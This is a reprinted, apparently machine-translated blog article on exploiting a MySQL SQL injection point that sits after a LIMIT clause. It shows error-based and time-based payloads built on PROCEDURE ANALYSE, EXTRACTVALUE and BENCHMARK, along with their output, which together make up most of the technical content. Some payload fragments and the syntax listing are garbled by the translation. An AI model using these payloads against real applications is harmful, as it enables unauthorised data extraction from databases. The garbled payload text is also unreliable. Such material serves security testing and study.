"Reprint" MySQL injection point after the Limit keyword utilization method

There are numerous articles describing the methods of SQL injection utilization, and this article will describe a special scenario.

Details

In a test, I ran into a SQL injection problem, there is no solution on the Internet, then the injection point is after the Limit keyword, the database is Mysql5.x,sql statement similar to the following:

Select field from table WHERE ID > 0 ORDER by ID LIMIT "injection point"

The point of the problem is that there is an order by keyword in the statement, and we know that in MySQL we can use the Union keyword in front of order by, so if there is no ORDER by keyword in front of the injection point, the Union keyword can be used smoothly, but now is the case There is an ORDER by keyword in front of the injection point, which is discussed on both StackOverflow and sla.ckers, but there is no effective solution.

Let's take a look at the syntax of select in the MySQL 5.x documentation:

select    [all | distinct | distinctrow ]       [HIGH_PRIORITY]      [STRAIGHT_JOIN]       [sql_small_result] [sql_big_result] [sql_buffer_result]      [ sql_cache | sql_no_cache] [sql_calc_found_rows]    select_expr [,  SELECT_EXPR&NBSP, ...]     [FROM table_references    [WHERE where_condition]     [GROUP BY {col_name | expr | position}       [ASC | DESC], ... [WITH ROLLUP]]    [HAVING  Where_condition]    [order by {col_name | expr | position}       [ASC | DESC],&NBSP, ...]     [limit {[offset,] row_count | row_count offset offset}]    [procedure  Procedure_name (argument_list)]    [into outfile  ' file_name '  export_options       | INTO DUMPFILE  ' file_name '        | INTO var_name [, var_name]]    [FOR UPDATE |  Lock in share mode]]

The Limit keyword is followed by the PROCEDURE and into keywords, the INTO keyword can be used to write files, but this is not important in this article, the focus here is the PROCEDURE keyword. MySQL default available stored procedures are only analyse (DOC).

Try using this stored procedure:

mysql> SELECT field from table where ID > 0 ORDER by ID LIMIT PROCEDURE analyse (1); ERROR 1386 (HY000): Can ' t use ORDER clause with this procedure

Analyse supports two parameters, try two parameters:

mysql> SELECT field from table where ID > 0 ORDER by ID LIMIT PROCEDURE analyse (all); ERROR 1386 (HY000): Can ' t use ORDER clause with this procedure

is still invalid, try inserting the SQL statement in analyse:

mysql> select field from table where ID > 0 ORDER BY ID LIMIT procedure Analyse ((SELECT IF (MID version (), p) LI KE 5, Sleep (5), 1)), 1);

The response is as follows:

ERROR 1108 (HY000): Incorrect parameters to procedure ' analyse '

It turns out that sleep was not executed, and eventually I tried the following payload:

mysql> SELECT field from the user WHERE ID >0 ORDER by ID LIMIT procedure Analyse (Extractvalue (rand (), concat (0x3a,ve Rsion ())), 1); Error 1105 (HY000): XPATH syntax error: ': 5.5.41-0ubuntu0.14.04.1 '

Aha, the above method is a common error injection, so if the injection point support error, then all the problems are OK, but if the injection point is not an error, you can also use time-based injection, payload as follows:

Select field from table WHERE ID > 0 ORDER by ID LIMIT PROCEDURE Analyse ((select Extractvalue (rand (), Concat (0x3a, (I F (MID (version (), a) like 5, BENCHMARK (5000000,SHA1 (1)), 1)))), 1)

Interestingly, it is not possible to use sleep and only use BENCHMARK.

In addition, there is a similar approach here https://rdot.org/forum/showpost.php?p=36186&postcount=30

[Refer to Source rateip.com, reprint please indicate from Freebuf hack and Geek (freebuf.com)]

"Reprint" MySQL injection point after the Limit keyword utilization method